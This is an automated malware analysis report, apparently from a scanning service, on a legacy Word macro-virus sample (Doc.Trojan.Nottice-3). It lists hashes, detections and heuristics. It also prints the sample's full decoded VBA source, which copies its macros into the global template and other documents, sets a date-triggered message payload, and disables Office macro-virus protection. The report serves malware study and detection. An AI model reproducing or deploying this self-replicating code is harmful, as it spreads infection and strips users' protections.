Office (OLE) malware analysis — malicious · f7ff31ab65de693e

MALICIOUS

Office (OLE)

34.5 KB Created: 2000-06-23 06:35:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 68fedb9c5fcc8382b32fb1bfe642bc60 SHA-1: 004f939e38f4b07d511886cfd718005cc11801c3 SHA-256: f7ff31ab65de693ee1611517ad9eb3c103e57a4a032188d1785d1a9f2047a94a

256 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample exhibits characteristics of a legacy WordBasic macro-virus and contains VBA macros, including AutoOpen and Auto_Close, which are often used to execute malicious code upon document opening or closing. The script attempts to copy macros named 'MAGIA', 'ToolsMacro', and 'ViewVBCode' to the current document and potentially globally, indicating an effort to embed or spread malicious functionality. The presence of 'Doc.Trojan.Nottice-3' and 'Win.Trojan.C-286' detections further supports a malicious classification.

Heuristics 6

ClamAV: Doc.Trojan.Nottice-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Nottice-3
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
.VirusProtection = False
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Name = "AutoOpen"
```

Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro

Matched line in script

WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoOpen"

Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3292 bytes
SHA-256: `d15848c6dcb9d178e06757f1426747db4d87ca1d7aebccd510c557f2841422e1`
Detection ClamAV: Win.Trojan.C-286 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "AutoOpen" Public Sub MAIN() Attribute MAIN.VB_Description = "F%" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN" Dim J$ On Error GoTo -1: On Error GoTo Huayco WordBasic.DisableAutoMacros 0 J$ = LCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10)) If J$ = "normal.dot" Then If Mur = 1 Then GoTo Huayco Else WichaDOC End If Else If Siwa = 1 Then GoTo Huayco Else WichaGlobal End If End If Huayco: WordBasic.Call "MAGIA" End Sub Private Function Mur() Dim i Mur = 0 If WordBasic.CountMacros(1) > 0 Then For i = 1 To WordBasic.CountMacros(1) If WordBasic.[MacroName$](i, 1) = "MAGIA" Then Mur = 1 End If Next i End If End Function Private Function Siwa() Dim i Siwa = 0 If WordBasic.CountMacros(0) > 0 Then For i = 1 To WordBasic.CountMacros(0) If WordBasic.[MacroName$](i, 0) = "MAGIA" Then Siwa = 1 End If Next i End If End Function Private Sub WichaDOC() WordBasic.FileSaveAs Format:=1 WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoOpen" WordBasic.MacroCopy "Global:MAGIA", WordBasic.[FileName$]() + ":MAGIA" WordBasic.MacroCopy "Global:ToolsMacro", WordBasic.[FileName$]() + ":ToolsMacro" WordBasic.MacroCopy "Global:ViewVBCode", WordBasic.[FileName$]() + ":ViewVBCode" WordBasic.FileSaveAll 1, 1 End Sub Private Sub WichaGlobal() WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Global:AutoClose" WordBasic.MacroCopy WordBasic.[FileName$]() + ":MAGIA", "Global:MAGIA" WordBasic.MacroCopy WordBasic.[FileName$]() + ":ToolsMacro", "Global:ToolsMacro" WordBasic.MacroCopy WordBasic.[FileName$]() + ":ViewVBCode", "Global:ViewVBCode" WordBasic.FileSaveAll 1, 0 End Sub Attribute VB_Name = "MAGIA" 'any change will kill your system 'wicha wicha wicha Public Sub MAIN() Attribute MAIN.VB_Description = "F%" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Normal.MAGIA.MAIN" If WordBasic.Day(WordBasic.Now()) = 19 Then WordBasic.FileNew WordBasic.ToggleFull WordBasic.DocMaximize WordBasic.Font "Imprint MT Shadow" WordBasic.FontSize 30 WordBasic.Bold WordBasic.FormatFont Color:=10 WordBasic.Insert "¡MaG0 ViRu5! " WordBasic.FormatFont Color:=1 WordBasic.FontSize 18 WordBasic.Insert " <Chac1acay0 -- PeRU>" End If With Options .VirusProtection = False End With End Sub Attribute VB_Name = "ToolsMacro" Public Sub MAIN() Attribute MAIN.VB_Description = "F%" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.HerramMacr.MAIN" 'wicha wicha wicha End Sub Attribute VB_Name = "ViewVBCode" Public Sub MAIN() Attribute MAIN.VB_Description = "F%" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.VerCódigovb.MAIN" 'wicha wicha wicha End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.